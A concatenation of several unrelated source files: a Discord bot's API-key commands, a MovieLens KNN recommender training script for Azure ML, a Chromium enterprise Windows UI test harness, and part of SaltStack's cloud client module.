@commands.check(UserIsAuthorised)
async def __generate_api_key__(ctx, name: str):
try:
changes = APIkeyManagement.genkey(name, apikeys)
apikeys.update(changes["apikeys"])
newkey = changes["newkey"]
saveconfigs(apikeys, shortlinks, shortlinks)
embed = discord.Embed(title="API Key Generated", description="The API key was generated", colour=0x00ff00)
embed.add_field(name="API Key", value=newkey)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
except Exception as e:
embed = discord.Embed(title="An Error Occured",
description="An internal error occured, this error has been logged to the console",
colour=0x00ff00)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
print(u"\u001b[31m" + e + "\u001b[0m")
@__apikey_command_group__.command(name="revoke")
@commands.check(UserIsAuthorised)
async def __revoke_api_key__(ctx, key: str):
try:
changes = APIkeyManagement.revokekey(key, apikeys)
apikeys.update(changes)
saveconfigs(apikeys, shortlinks, shortlinks)
embed = discord.Embed(title="API Key Revoked", description="", colour=0x00ff00)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
except Exception as e:
embed = discord.Embed(title="An Error Occured",
description="An internal error occured, this error has been logged to the console",
colour=0x00ff00)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
print(u"\u001b[31m" + e + "\u001b[0m")
time.sleep(1)
if Config["bot"]["Enabled"] == "True":
spinner.text = "Attempting to start Discord bot, please wait"
spinner.start()
try:
bot.run(Config["bot"]["token"])
except aiohttp.client_exceptions.ClientConnectorError:
spinner.stop()
print("""
=============================================================
| The bot failed to connect to discord! |
| Please ensure that this server has an internet connection.|
| The bot will be disabled for this session. |
=============================================================
""")
else:
print("""
=============================================================
| The bot is disabled! |
| Functionality that uses Discord will be unavailable! |
| Please see the doumentation for disabled features. |
=============================================================
""")
# =============================
# ==========DISCORD============
# =============================
|
train.py
|
from surprise import Dataset, evaluate
from surprise import KNNBasic
import zipfile
import os, io
import urllib.request
from sklearn.externals import joblib
from collections import defaultdict
from azureml.core.run import Run
import multiprocessing
def get_top3_recommendations(predictions, topN = 3):
top_recs = defaultdict(list)
for uid, iid, true_r, est, _ in predictions:
top_recs[uid].append((iid, est))
for uid, user_ratings in top_recs.items():
user_ratings.sort(key = lambda x: x[1], reverse = True)
top_recs[uid] = user_ratings[:topN]
return top_recs
def read_item_names():
"""Read the u.item file from MovieLens 100-k dataset and returns a
mapping to convert raw ids into movie names.
"""
file_name = (os.path.expanduser('~') +
'/.surprise_data/ml-100k/ml-100k/u.item')
rid_to_name = {}
with io.open(file_name, 'r', encoding='ISO-8859-1') as f:
for line in f:
line = line.split('|')
rid_to_name[line[0]] = line[1]
return rid_to_name
def executeTraining(modelFileName, simOptions):
knn = KNNBasic(sim_options=sim_options, k=3)
knn.train(trainingSet)
testSet = trainingSet.build_anti_testset()
predictions = knn.test(testSet)
os.makedirs('./outputs', exist_ok=True)
with open(modelFileName, "wb") as file:
joblib.dump(knn, os.path.join('./outputs/', modelFileName))
run = Run.get_submitted_run()
# manually downloading the file, as it requires a prompt otherwise
url='http://files.grouplens.org/datasets/movielens/ml-100k.zip'
DATASETS_DIR = os.path.expanduser('~') + '/.surprise_data/'
print("Starting")
name = 'ml-100k'
os.makedirs(DATASETS_DIR, exist_ok=True)
urllib.request.urlretrieve(url, DATASETS_DIR + 'tmp.zip')
with zipfile.ZipFile(DATASETS_DIR + 'tmp.zip', 'r') as tmp_zip:
tmp_zip.extractall(DATASETS_DIR + name)
data = Dataset.load_builtin(name)
trainingSet = data.build_full_trainset()
#############################################################################################################################
modelVariations={
"model1.pkl": {
'name': 'cosine',
'user_based': False
},
"model2.pkl": {
'name': 'cosine',
'user_based': True
},
"model3.pkl": {
'name': 'msd',
'user_based': True
}
}
threads = []
for modelFileName, sim_options in modelVariations.items():
t = multiprocessing.Process(name=modelFileName, target=executeTraining, args=(modelFileName, sim_options))
t.start()
threads.append(t)
# Wait for all threads
for thread in threads:
print("In loop of join")
thread.join()
print("Join lopp over")
|
ui_test.py
|
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
import random
import string
import subprocess
import threading
import time
from datetime import datetime
from chrome_ent_test.infra.core import *
@category("core")
@environment(file="./assets/ui_test.asset.textpb")
class UITest(EnterpriseTestCase):
"""Tests that running UI tests works on all versions of Windows.
"""
def _enableUITest(self, instance_name):
"""Configures the instance so that UI tests can be run on it."""
self.RunCommand(instance_name, r'md -Force c:\temp')
self.InstallChocolateyPackage(instance_name, 'chocolatey_core_extension',
'1.3.3')
self.InstallChocolateyPackage(instance_name, 'sysinternals',
'2019.6.12.20190614')
self.InstallPipPackagesLatest(
instance_name, ['absl-py', 'requests', 'pyperclip', 'pywinauto'])
password = self._generatePassword()
user_name = 'ui_user'
cmd = (r'powershell -File c:\cel\supporting_files\enable_auto_logon.ps1 '
r'-userName %s -password %s') % (user_name, password)
self.RunCommand(instance_name, cmd)
self._rebootInstance(instance_name)
cmd = (r'powershell -File c:\cel\supporting_files\set_ui_agent.ps1 '
'-username %s') % user_name
self.RunCommand(instance_name, cmd)
self._rebootInstance(instance_name)
def _rebootInstance(self, instance_name):
self.RunCommand(instance_name, 'shutdown /r /t 0')
# wait a little so that we can be sure the instance is
# rebooting
time.sleep(30)
# wait for the instance to boot up and ready
start_time = datetime.now()
while True:
try:
self.RunCommand(instance_name, 'whoami')
break
except:
logging.info('Instance is not ready. Retry')
now = datetime.now()
time_used = (now - start_time).total_seconds()
if time_used > 5 * 60:
self.fail("Time out when waiting for instance to boot up")
else:
time.sleep(60)
def _generatePassword(self):
"""Generates a random password."""
s = [random.choice(string.ascii_lowercase) for _ in range(4)]
s += [random.choice(string.ascii_uppercase) for _ in range(4)]
s += [random.choice(string.digits) for _ in range(4)]
random.shuffle(s)
return ''.join(s)
def _runUITest(self, instance_name, test_file, timeout=300, args=[]):
"""Runs a UI test on an instance.
Args:
instance_name: name of the instance.
test_file: the path of the UI test file.
timeout: the timeout in seconds. Default is 300,
i.e. 5 minutes.
args: the list of arguments passed to the test.
Returns:
the output."""
self.EnsurePythonInstalled(instance_name)
# upload the test
file_name = self.UploadFile(instance_name, test_file, r'c:\temp')
# run the test.
# note that '-u' flag is passed to enable unbuffered stdout and stderr.
# Without this flag, if the test is killed because of timeout, we will not
# get any output from stdout because the output is buffered. When this
# happens it makes debugging really hard.
args = subprocess.list2cmdline(args)
ui_test_cmd = r'{0} -u {1} {2}'.format(
self._pythonExecutablePath[instance_name], file_name, args)
cmd = (r'{0} '
r'c:\cel\supporting_files\run_ui_test.py '
r'--timeout {1} -- {2}').format(
self._pythonExecutablePath[instance_name], timeout, ui_test_cmd)
return self.RunCommand(instance_name, cmd)
def _runUITestOnInstance(self, instance_name, error):
"""Runs a UI test on the specified instance.
Args:
instance_name: the instance where the UI test is run
error: a list. If the UI test cannot run successfully, an
error message will be appended to the list
"""
try:
self._enableUITest(instance_name)
dir = os.path.dirname(os.path.abspath(__file__))
test_file = os.path.join(dir, 'ui_test_on_instance.py')
output = self._runUITest(instance_name, test_file)
self.assertIn('SUCCESS', output)
self.assertIn('PASTE', output)
except:
error += ["UI test failed on %s" % instance_name]
@test
def runUITests(self):
# run tests on instances in parallel. It takes about 10 minutes on
# one instance, so, it'll take 50 minutes to run them in parallel.
threads = []
error = []
for client in ['win2008', 'win2012', 'win2016']:
threads += [
threading.Thread(
target=self._runUITestOnInstance, args=(client, error))
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# assert that there are no errors
self.assertFalse(error)
|
__init__.py
|
# -*- coding: utf-8 -*-
"""
The top level interface used to translate configuration data back to the
correct cloud modules
"""
# Import python libs
from __future__ import absolute_import, generators, print_function, unicode_literals
import copy
import glob
import logging
import multiprocessing
import os
import signal
import sys
import time
import traceback
from itertools import groupby
import salt.client
# Import salt libs
import salt.config
import salt.loader
import salt.syspaths
import salt.utils.args
import salt.utils.cloud
import salt.utils.context
import salt.utils.crypt
import salt.utils.data
import salt.utils.dictupdate
import salt.utils.files
import salt.utils.user
import salt.utils.verify
import salt.utils.yaml
# Import salt.cloud libs
from salt.exceptions import (
SaltCloudConfigError,
SaltCloudException,
SaltCloudNotFound,
SaltCloudSystemExit,
)
from salt.ext import six
from salt.ext.six.moves import input # pylint: disable=import-error,redefined-builtin
from salt.template import compile_template
# Import third party libs
try:
import Cryptodome.Random
except ImportError:
try:
import Crypto.Random
except ImportError:
pass # pycrypto < 2.1
# Get logging started
log = logging.getLogger(__name__)
def communicator(func):
"""Warning, this is a picklable decorator !"""
def _call(queue, args, kwargs):
"""called with [queue, args, kwargs] as first optional arg"""
kwargs["queue"] = queue
ret = None
try:
ret = func(*args, **kwargs)
queue.put("END")
except KeyboardInterrupt as ex:
trace = traceback.format_exc()
queue.put("KEYBOARDINT")
queue.put("Keyboard interrupt")
queue.put("{0}\n{1}\n".format(ex, trace))
except Exception as ex: # pylint: disable=broad-except
trace = traceback.format_exc()
queue.put("ERROR")
queue.put("Exception")
queue.put("{0}\n{1}\n".format(ex, trace))
except SystemExit as ex:
trace = traceback.format_exc()
queue.put("ERROR")
queue.put("System exit")
queue.put("{0}\n{1}\n".format(ex, trace))
return ret
return _call
def enter_mainloop(
target,
mapped_args=None,
args=None,
kwargs=None,
pool=None,
pool_size=None,
callback=None,
queue=None,
):
"""
Manage a multiprocessing pool
- If the queue does not output anything, the pool runs indefinitely
- If the queue returns KEYBOARDINT or ERROR, this will kill the pool
totally calling terminate & join and ands with a SaltCloudSystemExit
exception notifying callers from the abnormal termination
- If the queue returns END or callback is defined and returns True,
it just join the process and return the data.
target
the function you want to execute in multiproccessing
pool
pool object can be None if you want a default pool, but you ll
have then to define pool_size instead
pool_size
pool size if you did not provide yourself a pool
callback
a boolean taking a string in argument which returns True to
signal that 'target' is finished and we need to join
the pool
queue
A custom multiproccessing queue in case you want to do
extra stuff and need it later in your program
args
positional arguments to call the function with
if you don't want to use pool.map
mapped_args
a list of one or more arguments combinations to call the function with
e.g. (foo, [[1], [2]]) will call::
foo([1])
foo([2])
kwargs
kwargs to give to the function in case of process
Attention, the function must have the following signature:
target(queue, *args, **kw)
You may use the 'communicator' decorator to generate such a function
(see end of this file)
"""
if not kwargs:
kwargs = {}
if not pool_size:
pool_size = 1
if not pool:
pool = multiprocessing.Pool(pool_size)
if not queue:
manager = multiprocessing.Manager()
queue = manager.Queue()
if mapped_args is not None and not mapped_args:
msg = (
"We are called to asynchronously execute {0}"
" but we do no have anything to execute, weird,"
" we bail out".format(target)
)
log.error(msg)
raise SaltCloudSystemExit("Exception caught\n{0}".format(msg))
elif mapped_args is not None:
iterable = [[queue, [arg], kwargs] for arg in mapped_args]
ret = pool.map(func=target, iterable=iterable)
else:
ret = pool.apply(target, [queue, args, kwargs])
while True:
test = queue.get()
if test in ["ERROR", "KEYBOARDINT"]:
type_ = queue.get()
trace = queue.get()
msg = "Caught {0}, terminating workers\n".format(type_)
msg += "TRACE: {0}\n".format(trace)
log.error(msg)
pool.terminate()
pool.join()
raise SaltCloudSystemExit("Exception caught\n{0}".format(msg))
elif test in ["END"] or (callback and callback(test)):
pool.close()
pool.join()
break
else:
time.sleep(0.125)
return ret
class CloudClient(object):
"""
The client class to wrap cloud interactions
"""
def __init__(self, path=None, opts=None, config_dir=None, pillars=None):
if opts:
self.opts = opts
else:
self.opts = salt.config.cloud_config(path)
# Check the cache-dir exists. If not, create it.
v_dirs = [self.opts["cachedir"]]
salt.utils.verify.verify_env(v_dirs, salt.utils.user.get_user())
if pillars:
for name, provider in six.iteritems(pillars.pop("providers", {})):
driver = provider["driver"]
provider["profiles"] = {}
self.opts["providers"].update({name: {driver: provider}})
for name, profile in six.iteritems(pillars.pop("profiles", {})):
provider = profile["provider"].split(":")[0]
driver = next(six.iterkeys(self.opts["providers"][provider]))
profile["provider"] = "{0}:{1}".format(provider, driver)
profile["profile"] = name
self.opts["profiles"].update({name: profile})
self.opts["providers"][provider][driver]["profiles"].update(
{name: profile}
)
for name, map_dct in six.iteritems(pillars.pop("maps", {})):
if "maps" not in self.opts:
self.opts["maps"] = {}
self.opts["maps"][name] = map_dct
self.opts.update(pillars)
def _opts_defaults(self, **kwargs):
"""
Set the opts dict to defaults and allow for opts to be overridden in
the kwargs
"""
# Let's start with the default salt cloud configuration
opts = salt.config.DEFAULT_CLOUD_OPTS.copy()
# Update it with the loaded configuration
opts.update(self.opts.copy())
# Reset some of the settings to sane values
opts["parallel"] = False
opts["keep_tmp"] = False
opts["deploy"] = True
opts["update_bootstrap"] = False
opts["show_deploy_args"] = False
opts["script_args"] = ""
# Update it with the passed kwargs
if "kwargs" in kwargs:
opts.update(kwargs["kwargs"])
opts.update(kwargs)
profile = opts.get("profile", None)
# filter other profiles if one is specified
if profile:
tmp_profiles = opts.get("profiles", {}).copy()
for _profile in [a for a in tmp_profiles]:
if not _profile == profile:
tmp_profiles.pop(_profile)
# if profile is specified and we have enough info about providers
# also filter them to speedup methods like
# __filter_non_working_providers
providers = [
a.get("provider", "").split(":")[0]
for a in six.itervalues(tmp_profiles)
if a.get("provider", "")
]
if providers:
_providers = opts.get("providers", {})
for provider in _providers.copy():
if provider not in providers:
_providers.pop(provider)
return opts
def low(self, fun, low):
"""
Pass the cloud function and low data structure to run
"""
l_fun = getattr(self, fun)
f_call = salt.utils.args.format_call(l_fun, low)
return l_fun(*f_call.get("args", ()), **f_call.get("kwargs", {}))
def list_sizes(self, provider=None):
"""
List all available sizes in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.size_list(provider))
def list_images(self, provider=None):
"""
List all available images in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.image_list(provider))
def list_locations(self, provider=None):
"""
List all available locations in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.location_list(provider))
def query(self, query_type="list_nodes"):
"""
Query basic instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes"
return mapper.map_providers_parallel(query_type)
def full_query(self, query_type="list_nodes_full"):
"""
Query all instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_full"
return mapper.map_providers_parallel(query_type)
def select_query(self, query_type="list_nodes_select"):
"""
Query select instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_select"
return mapper.map_providers_parallel(query_type)
def min_query(self, query_type="list_nodes_min"):
"""
Query select instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_min"
return mapper.map_providers_parallel(query_type)
def profile(self, profile, names, vm_overrides=None, **kwargs):
"""
Pass in a profile to create, names is a list of vm names to allocate
vm_overrides is a special dict that will be per node options
overrides
Example:
.. code-block:: python
>>> client= salt.cloud.CloudClient(path='/etc/salt/cloud')
>>> client.profile('do_512_git', names=['minion01',])
{'minion01': {'backups_active': 'False',
'created_at': '2014-09-04T18:10:15Z',
'droplet': {'event_id': 31000502,
'id': 2530006,
'image_id': 5140006,
'name': 'minion01',
'size_id': 66},
'id': '2530006',
'image_id': '5140006',
'ip_address': '107.XXX.XXX.XXX',
'locked': 'True',
'name': 'minion01',
'private_ip_address': None,
'region_id': '4',
'size_id': '66',
'status': 'new'}}
"""
if not vm_overrides:
vm_overrides = {}
kwargs["profile"] = profile
mapper = salt.cloud.Map(self._opts_defaults(**kwargs))
if isinstance(names, six.string_types):
names = names.split(",")
return salt.utils.data.simple_types_filter(
mapper.run_profile(profile, names, vm_overrides=vm_overrides)
)
def map_run(self, path=None, **kwargs):
"""
To execute a map
"""
kwarg = {}
if path:
kwarg["map"] = path
kwarg.update(kwargs)
mapper = salt.cloud.Map(self._opts_defaults(**kwarg))
dmap = mapper.map_data()
return salt.utils.data.simple_types_filter(mapper.run_map(dmap))
def destroy(self, names):
"""
Destroy the named VMs
"""
mapper = salt.cloud.Map(self._opts_defaults(destroy=True))
if isinstance(names, six.string_types):
names = names.split(",")
return salt.utils.data.simple_types_filter(mapper.destroy(names))
def create(self, provider, names, **kwargs):
"""
Create the named VMs, without using a profile
Example:
.. code-block:: python
client.create(provider='my-ec2-config', names=['myinstance'],
image='ami-1624987f', size='t1.micro', ssh_username='ec2-user',
securitygroup='default', delvol_on_destroy=True)
"""
mapper = salt.cloud.Map(self._opts_defaults())
providers = self.opts["providers"]
if provider in providers:
provider += ":{0}".format(next(six.iterkeys(providers[provider])))
else:
return False
if isinstance(names, six.string_types):
names = names.split(",")
ret = {}
for name in names:
vm_ = kwargs.copy()
vm_["name"] = name
vm_["driver"] = provider
# This function doesn't require a profile, but many cloud drivers
# check for profile information (which includes the provider key) to
# help with config file debugging and setting up instances. Setting
# the profile and provider defaults here avoids errors in other
# cloud functions relying on these keys. See SaltStack Issue #41971
# and PR #38166 for more information.
vm_["profile"] = None
vm_["provider"] = provider
ret[name] = salt.utils.data.simple_types_filter(mapper.create(vm_))
return ret
def extra_action(self, names, provider, action, **kwargs):
"""
Perform actions with block storage devices
Example:
.. code-block:: python
client.extra_action(names=['myblock'], action='volume_create',
provider='my-nova', kwargs={'voltype': 'SSD', 'size': 1000}
)
client.extra_action(names=['salt-net'], action='network_create',
provider='my-nova', kwargs={'cidr': '192.168.100.0/24'}
)
"""
mapper = salt.cloud.Map(self._opts_defaults())
providers = mapper.map_providers_parallel()
if provider in providers:
provider += ":{0}".format(next(six.iterkeys(providers[provider])))
else:
return False
if isinstance(names, six.string_types):
names = names.split(",")
ret = {}
for name in names:
extra_ = kwargs.copy()
extra_["name"] = name
extra_["provider"] = provider
extra_["profile"] = None
extra_["action"] = action
ret[name] = salt.utils.data.simple_types_filter(mapper.extras(extra_))
return ret
def action(
self,
fun=None,
cloudmap=None,
names=None,
provider=None,
instance=None,
kwargs=None,
):
"""
Execute a single action via the cloud plugin backend
Examples:
.. code-block:: python
client.action(fun='show_instance', names=['myinstance'])
client.action(fun='show_image', provider='my-ec2-config',
kwargs={'image': 'ami-10314d79'}
)
"""
if kwargs is None:
kwargs = {}
mapper = salt.cloud.Map(self._opts_defaults(action=fun, names=names, **kwargs))
if instance:
if names:
raise SaltCloudConfigError(
"Please specify either a list of 'names' or a single "
"'instance', but not both."
)
names = [instance]
if names and not provider:
self.opts["action"] = fun
return mapper.do_action(names, kwargs)
if provider and not names:
return mapper.do_function(provider, fun, kwargs)
else:
# This should not be called without either an instance or a
# provider. If both an instance/list of names and a provider
# are given, then we also need to exit. We can only have one
# or the other.
raise SaltCloudConfigError(
"Either an instance (or list of names) or a provider must be "
"specified, but not both."
)
class Cloud(object):
"""
An object for the creation of new VMs
"""
def __init__(self, opts):
self.opts = opts
self.clouds = salt.loader.clouds(self.opts)
self.__filter_non_working_providers()
self.__cached_provider_queries = {}
def get_configured_providers(self):
"""
Return the configured providers
"""
providers = set()
for alias, drivers in six.iteritems(self.opts["providers"]):
if len(drivers) > 1:
for driver in drivers:
providers.add("{0}:{1}".format(alias, driver))
continue
providers.add(alias)
return providers
def lookup_providers(self, lookup):
"""
Get a dict describing the configured providers
"""
if lookup is None:
lookup = "all"
if lookup == "all":
providers = set()
for alias, drivers in six.iteritems(self.opts["providers"]):
for driver in drivers:
providers.add((alias, driver))
if not providers:
raise SaltCloudSystemExit("There are no cloud providers configured.")
return providers
if ":" in lookup:
alias, driver = lookup.split(":")
if (
alias not in self.opts["providers"]
or driver not in self.opts["providers"][alias]
):
raise SaltCloudSystemExit(
"No cloud providers matched '{0}'. Available: {1}".format(
lookup, ", ".join(self.get_configured_providers())
)
)
providers = set()
for alias, drivers in six.iteritems(self.opts["providers"]):
for driver in drivers:
if lookup in (alias, driver):
providers.add((alias, driver))
if not providers:
raise SaltCloudSystemExit(
"No cloud providers matched '{0}'. "
"Available selections: {1}".format(
lookup, ", ".join(self.get_configured_providers())
)
)
return providers
def lookup_profiles(self, provider, lookup):
"""
Return a dictionary describing the configured profiles
"""
if provider is None:
provider = "all"
if lookup is None:
lookup = "all"
if lookup == "all":
profiles = set()
provider_profiles = set()
for alias, info in six.iteritems(self.opts["profiles"]):
providers = info.get("provider")
if providers:
given_prov_name = providers.split(":")[0]
salt_prov_name = providers.split(":")[1]
if given_prov_name == provider:
provider_profiles.add((alias, given_prov_name))
elif salt_prov_name == provider:
provider_profiles.add((alias, salt_prov_name))
profiles.add((alias, given_prov_name))
if not profiles:
raise SaltCloudSystemExit("There are no cloud profiles configured.")
if provider != "all":
return provider_profiles
return profiles
def map_providers(self, query="list_nodes", cached=False):
"""
Return a mapping of what named VMs are running on what VM providers
based on what providers are defined in the configuration and VMs
"""
if cached is True and query in self.__cached_provider_queries:
return self.__cached_provider_queries[query]
pmap = {}
for alias, drivers in six.iteritems(self.opts["providers"]):
for driver, details in six.iteritems(drivers):
fun = "{0}.{1}".format(driver, query)
if fun not in self.clouds:
log.error("Public cloud provider %s is not available", driver)
continue
if alias not in pmap:
pmap[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun],
__active_provider_name__=":".join([alias, driver]),
):
pmap[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.debug(
"Failed to execute '%s()' while querying for "
"running nodes: %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
# Failed to communicate with the provider, don't list any
# nodes
pmap[alias][driver] = []
self.__cached_provider_queries[query] = pmap
return pmap
def map_providers_parallel(self, query="list_nodes", cached=False):
"""
Return a mapping of what named VMs are running on what VM providers
based on what providers are defined in the configuration and VMs
Same as map_providers but query in parallel.
"""
if cached is True and query in self.__cached_provider_queries:
return self.__cached_provider_queries[query]
opts = self.opts.copy()
multiprocessing_data = []
# Optimize Providers
opts["providers"] = self._optimize_providers(opts["providers"])
for alias, drivers in six.iteritems(opts["providers"]):
# Make temp query for this driver to avoid overwrite next
this_query = query
for driver, details in six.iteritems(drivers):
# If driver has function list_nodes_min, just replace it
# with query param to check existing vms on this driver
# for minimum information, Otherwise still use query param.
if (
opts.get("selected_query_option") is None
and "{0}.list_nodes_min".format(driver) in self.clouds
):
this_query = "list_nodes_min"
fun = "{0}.{1}".format(driver, this_query)
if fun not in self.clouds:
log.error("Public cloud provider %s is not available", driver)
continue
multiprocessing_data.append(
{
"fun": fun,
"opts": opts,
"query": this_query,
"alias": alias,
"driver": driver,
}
)
output = {}
if not multiprocessing_data:
return output
data_count = len(multiprocessing_data)
pool = multiprocessing.Pool(
data_count < 10 and data_count or 10, init_pool_worker
)
parallel_pmap = enter_mainloop(
_run_parallel_map_providers_query, multiprocessing_data, pool=pool
)
for alias, driver, details in parallel_pmap:
if not details:
# There's no providers details?! Skip it!
continue
if alias not in output:
output[alias] = {}
output[alias][driver] = details
self.__cached_provider_queries[query] = output
return output
def get_running_by_names(
self, names, query="list_nodes", cached=False, profile=None
):
if isinstance(names, six.string_types):
names = [names]
matches = {}
handled_drivers = {}
mapped_providers = self.map_providers_parallel(query, cached=cached)
for alias, drivers in six.iteritems(mapped_providers):
for driver, vms in six.iteritems(drivers):
if driver not in handled_drivers:
handled_drivers[driver] = alias
# When a profile is specified, only return an instance
# that matches the provider specified in the profile.
# This solves the issues when many providers return the
# same instance. For example there may be one provider for
# each availability zone in amazon in the same region, but
# the search returns the same instance for each provider
# because amazon returns all instances in a region, not
# availability zone.
if (
profile
and alias
not in self.opts["profiles"][profile]["provider"].split(":")[0]
):
continue
for vm_name, details in six.iteritems(vms):
# XXX: The logic below can be removed once the aws driver
# is removed
if vm_name not in names:
continue
elif (
driver == "ec2"
and "aws" in handled_drivers
and "aws" in matches[handled_drivers["aws"]]
and vm_name in matches[handled_drivers["aws"]]["aws"]
):
continue
elif (
driver == "aws"
and "ec2" in handled_drivers
and "ec2" in matches[handled_drivers["ec2"]]
and vm_name in matches[handled_drivers["ec2"]]["ec2"]
):
continue
if alias not in matches:
matches[alias] = {}
if driver not in matches[alias]:
matches[alias][driver] = {}
matches[alias][driver][vm_name] = details
return matches
def _optimize_providers(self, providers):
"""
Return an optimized mapping of available providers
"""
new_providers = {}
provider_by_driver = {}
for alias, driver in six.iteritems(providers):
for name, data in six.iteritems(driver):
if name not in provider_by_driver:
provider_by_driver[name] = {}
provider_by_driver[name][alias] = data
for driver, providers_data in six.iteritems(provider_by_driver):
fun = "{0}.optimize_providers".format(driver)
if fun not in self.clouds:
log.debug("The '%s' cloud driver is unable to be optimized.", driver)
for name, prov_data in six.iteritems(providers_data):
if name not in new_providers:
new_providers[name] = {}
new_providers[name][driver] = prov_data
continue
new_data = self.clouds[fun](providers_data)
if new_data:
for name, prov_data in six.iteritems(new_data):
if name not in new_providers:
new_providers[name] = {}
new_providers[name][driver] = prov_data
return new_providers
def location_list(self, lookup="all"):
"""
Return a mapping of all location data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{0}.avail_locations".format(driver)
if fun not in self.clouds:
# The capability to gather locations is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the locations information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def image_list(self, lookup="all"):
"""
Return a mapping of all image data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{0}.avail_images".format(driver)
if fun not in self.clouds:
# The capability to gather images is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the images information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def size_list(self, lookup="all"):
"""
Return a mapping of all image data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{0}.avail_sizes".format(driver)
if fun not in self.clouds:
# The capability to gather sizes is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the sizes information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def provider_list(self, lookup="all"):
"""
Return a mapping of all image data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
if alias not in data:
data[alias] = {}
if driver not in data[alias]:
data[alias][driver] = {}
return data
def profile_list(self, provider, lookup="all"):
"""
Return a mapping of all configured profiles
"""
data = {}
lookups = self.lookup_profiles(provider, lookup)
if not lookups:
return data
for alias, driver in lookups:
if alias not in data:
data[alias] = {}
if driver not in data[alias]:
data[alias][driver] = {}
return data
def create_all(self):
"""
Create/Verify the VMs in the VM data
"""
ret = []
for vm_name, vm_details in six.iteritems(self.opts["profiles"]):
ret.append({vm_name: self.create(vm_details)})
return ret
def destroy(self, names, cached=False):
"""
Destroy the named VMs
"""
processed = {}
names = set(names)
matching = self.get_running_by_names(names, cached=cached)
vms_to_destroy = set()
parallel_data = []
for alias, drivers in six.iteritems(matching):
for driver, vms in six.iteritems(drivers):
for name in vms:
if name in names:
vms_to_destroy.add((alias, driver, name))
if self.opts["parallel"]:
parallel_data.append(
{
"opts": self.opts,
"name": name,
"alias": alias,
"driver": driver,
}
)
# destroying in parallel
if self.opts["parallel"] and parallel_data:
# set the pool size based on configuration or default to
# the number of machines we're destroying
if "pool_size" in self.opts:
pool_size = self.opts["pool_size"]
else:
pool_size = len(parallel_data)
log.info("Destroying in parallel mode; " "Cloud pool size: %s", pool_size)
# kick off the parallel destroy
output_multip = enter_mainloop(
_destroy_multiprocessing, parallel_data, pool_size=pool_size
)
# massage the multiprocessing output a bit
ret_multip = {}
for obj in output_multip:
ret_multip.update(obj)
# build up a data structure similar to what the non-parallel
# destroy uses
for obj in parallel_data:
alias = obj["alias"]
driver = obj["driver"]
name = obj["name"]
if alias not in processed:
processed[alias] = {}
if driver not in processed[alias]:
processed[alias][driver] = {}
processed[alias][driver][name] = ret_multip[name]
if name in names:
names.remove(name)
# not destroying in parallel
else:
log.info("Destroying in non-parallel mode.")
for alias, driver, name in vms_to_destroy:
fun = "{0}.destroy".format(driver)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
ret = self.clouds[fun](name)
if alias not in processed:
processed[alias] = {}
if driver not in processed[alias]:
processed[alias][driver] = {}
processed[alias][driver][name] = ret
if name in names:
names.remove(name)
# now the processed data structure contains the output from either
# the parallel or non-parallel destroy and we should finish up
# with removing minion keys if necessary
for alias, driver, name in vms_to_destroy:
ret = processed[alias][driver][name]
if not ret:
continue
vm_ = {
"name": name,
"profile": None,
"provider": ":".join([alias, driver]),
"driver": driver,
}
minion_dict = salt.config.get_cloud_config_value(
"minion", vm_, self.opts, default={}
)
key_file = os.path.join(
